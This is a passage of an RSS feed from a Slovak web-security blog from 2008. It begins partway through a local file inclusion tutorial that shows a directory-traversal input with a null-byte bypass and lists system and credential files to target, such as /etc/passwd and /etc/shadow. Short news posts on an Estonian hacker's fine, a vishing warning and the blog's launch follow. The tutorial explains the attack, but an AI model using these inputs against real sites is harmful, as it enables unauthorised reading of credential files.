style=&quot;font-family:arial;&quot;&gt;../.&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: rgb(51, 51, 255);font-size:100%;&quot; &gt;&lt;span style=&quot;font-family:arial;&quot;&gt;./&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: rgb(51, 51, 255);font-size:100%;&quot; &gt;&lt;span style=&quot;font-family:arial;&quot;&gt;../etc/passwd%oo&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: rgb(51, 51, 255);font-size:100%;&quot; &gt;&lt;span style=&quot;font-family:arial;&quot;&gt;&amp;amp;id_user=86&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color: rgb(0, 0, 0);&quot;&gt;tento bypass spôsobý, že všetko za ním  bude ignorované (v našom prípade id_user )&lt;br /&gt;Ešte niekoľko zaujímavých príkladov lokálneho skriptovania:&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: rgb(51, 51, 255);font-family:arial;font-size:100%;&quot;  &gt;/etc/passwd&lt;/span&gt;&lt;span style=&quot;font-size:100%;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;color: rgb(51, 51, 255);font-family:arial;font-size:100%;&quot;  &gt;/etc/shadow&lt;/span&gt;&lt;span style=&quot;font-size:100%;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;color: rgb(51, 51, 255);font-family:arial;font-size:100%;&quot;  &gt;/etc/group&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;color: rgb(51, 51, 255);font-family:georgia;font-size:100%;&quot;  &gt;&lt;span style=&quot;color: rgb(51, 51, 255);&quot;&gt;&lt;span style=&quot;font-family:arial;&quot;&gt;/etc/profile&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family:arial;&quot;&gt;/etc/hosts&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: rgb(51, 51, 255);font-family:arial;font-size:100%;&quot;  &gt;/etc/security/group&lt;/span&gt;&lt;span style=&quot;font-size:100%;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;color: rgb(51, 51, 255);font-family:arial;font-size:100%;&quot;  &gt;/etc/security/passwd&lt;/span&gt;&lt;span style=&quot;font-size:100%;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;color: rgb(51, 51, 255);font-family:arial;font-size:100%;&quot;  &gt;/etc/security/user&lt;/span&gt;&lt;span style=&quot;font-size:100%;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;color: rgb(51, 51, 255);font-family:arial;font-size:100%;&quot;  &gt;/etc/security/environ&lt;/span&gt;&lt;span style=&quot;font-size:100%;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;color: rgb(51, 51, 255);font-family:arial;font-size:100%;&quot;  &gt;/etc/security/limits&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;color: rgb(51, 51, 255);&quot;&gt;&lt;span style=&quot;color: rgb(51, 51, 255);font-family:arial;font-size:100%;&quot;  &gt;/usr/lib/security/mkuser.default&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color: rgb(0, 0, 0);&quot;&gt;&lt;span style=&quot;font-family:arial;&quot;&gt;Je to veľmi zaujímavá metóda, ale musím podotknúť, že na ňu treba istú dávku šťastia. Tí, ktorý pochopili problematiku vedia, že hore uvedené adresáre im môžu, ale aj nemusia pomôct na náchylnej stránke pretože web môže mať úplne odlišný strom adresárov.&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;&quot;&gt;&lt;/span&gt;</description><link>http://webprotected.blogspot.com/2008/02/local-file-inclusion.html</link><author>noreply@blogger.com (Unknown)</author><thr:total>1</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-464579124419695192.post-4842010755622440933</guid><pubDate>Sun, 03 Feb 2008 12:57:00 +0000</pubDate><atom:updated>2008-02-03T14:05:45.530+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">News</category><title>Hacker dostal mastnú pokutu</title><description>V estónskom hlavnom meste Tallin bol odsúdený prvý počítačový pirát, ktorý zaútočil na webové stránky štátnych inštitúcií. Dvadsaťročný Estónec ruskej národnosti sa priznal, že vyradil z prevádzky internetovú stránku premiéra Andruse Ansipa. Dostal pokutu v prepočte približne za 30 000 našich korún čo neni tak hrozne ale stálo mu to za to?Ja myslím že nie &lt;span style=&quot;&quot;&gt;■&lt;/span&gt;</description><link>http://webprotected.blogspot.com/2008/02/hacker-dostal-mastn-pokutu.html</link><author>noreply@blogger.com (Unknown)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-464579124419695192.post-182252090306954080</guid><pubDate>Sun, 03 Feb 2008 11:08:00 +0000</pubDate><atom:updated>2008-02-03T12:20:55.704+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">News</category><title>Nová hrozba s názvom Vishing?</title><description>IC3 (Internet Crime Complaint Center, FBI) varuje na rastúce útoky pod názvom vishing. Technológia vishing nabáda obete na komunikáciu za účelom riešenie technických problémov alebo problémov s účtom v ich banke . Ide o podvod, kde zločinecké skupiny zasielajú e-mail alebo textové správy na mobilné telefóny obetiam, ktoré hovoria o vzniknutom bezpečnostnom probléme a žiadajú obeť aby kontaktovala telefonicky priamo ich alebo banku z dôvodu reaktivácie kreditnej alebo debetnej platobnej karty. Po zavolaní na telefónne číslo, ktoré bolo uvedené v správe sa ozve uvítanie banky a následne žiadosť o zadanie čísla karty alebo iných údajov, ktoré útočník potrebuje pre zneužitie pod zámienkou vyriešenia bezpečnostných alebo iných problémov. Tieto útoky zosilneli najmä preto, že v posledných rokoch výrazne zlacnela VoIP technológia a pribudli open source call centrá, ktoré je možné takto zneužívať. Bezpečnostný experti hovoria, že vishing môže byť oveľa efektívnejší ako tradičné phishing technológie, ktoré obete presmerujú na nepravé stránky zväčša bankových inštitúcií najmä z dôvodu, že táto forma útokov nie je ešte tak rozšírená. Pre zabránenie zneužitia prostredníctvom vishingu sa odporúča aby ľudia po prijatí správy alebo telefonického hovoru, kde odosielateľ sa predstavuje ako banka si overili či ich kontaktovala naozaj banka a to tak, že si skontrolujú kontaktné údaje na internete a priamo banku kontaktujú alebo sa dostavia do banky osobne&lt;span style=&quot;font-family: arial;&quot;&gt;&lt;/span&gt;&lt;span style=&quot;&quot;&gt; ■&lt;/span&gt;&lt;!--eTarget ContextAd End --&gt;</description><link>http://webprotected.blogspot.com/2008/02/nov-hrozba-s-nzvom-vishing.html</link><author>noreply@blogger.com (Unknown)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-464579124419695192.post-5497165028119375229</guid><pubDate>Thu, 31 Jan 2008 19:18:00 +0000</pubDate><atom:updated>2008-02-01T17:37:43.184+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">News</category><title>Spustenie webu</title><description>&lt;span style=&quot;font-family:arial;&quot;&gt;Tak a je to tu!Konečne som spustil svoj vlastný web cez stránku &lt;/span&gt;&lt;a style=&quot;font-family: arial;&quot; href=&quot;http://www.blogger.com/&quot;&gt;blogger&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color: rgb(255, 0, 0); font-weight: bold;font-family:courier new;font-size:130%;&quot;  &gt;O čom budem písať?&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;color: rgb(255, 0, 0);font-family:courier new;font-size:100%;&quot;  &gt;&lt;span style=&quot;color: rgb(0, 0, 0);&quot;&gt;Prevažne o bezpečnosti webových aplikácií, o možných zraniteľnostiach alebo metódach útoku na webovú stránku.Súčasne sa budem snažiť držať temto s dobou a vydávať aktuálne novinky&lt;/span&gt;&lt;/span&gt;  &lt;span style=&quot;font-size: 12pt; font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;■&lt;/span&gt;         &lt;br /&gt;&lt;span style=&quot;font-size:100%;&quot;&gt;&lt;span style=&quot;font-family:arial;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;</description><link>http://webprotected.blogspot.com/2008/01/test.html</link><author>noreply@blogger.com (Unknown)</author><thr:total>0</thr:total></item></channel></rss>